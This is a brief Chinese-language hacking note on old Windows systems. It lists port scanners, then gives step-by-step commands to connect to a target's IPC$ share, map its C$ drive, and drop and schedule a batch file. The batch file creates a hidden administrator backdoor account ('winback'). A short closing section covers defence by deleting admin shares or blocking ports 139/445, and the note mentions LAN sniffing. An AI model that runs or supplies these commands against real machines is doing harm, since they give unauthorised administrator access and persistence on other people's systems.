扫描: superScan x-scan 流光主机
只能是windows
扫描ipc$ 可以使用 net use \ip\ipc$ 命令来进行连接
可以将对方的磁盘映射到本地计算机 net use y: \ip\c$ 将对方的c盘映射到本地的y盘
可以通过这个来创建后门账号,编写批处理文件放入到目标主机中
添加用户和分组1
2net user winback 123456 /add
net localgroup administrators winback /add
将该bat文件拷贝到目标主机
copy winback.bat \ip\c$
然后通过一些命令来执行该脚本,如at定时
at \ip 时间 c:\winback.bat
防范
去除IPC$共享
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete
或者屏蔽139/445端口
嗅探:局域网窃听工具 sniffer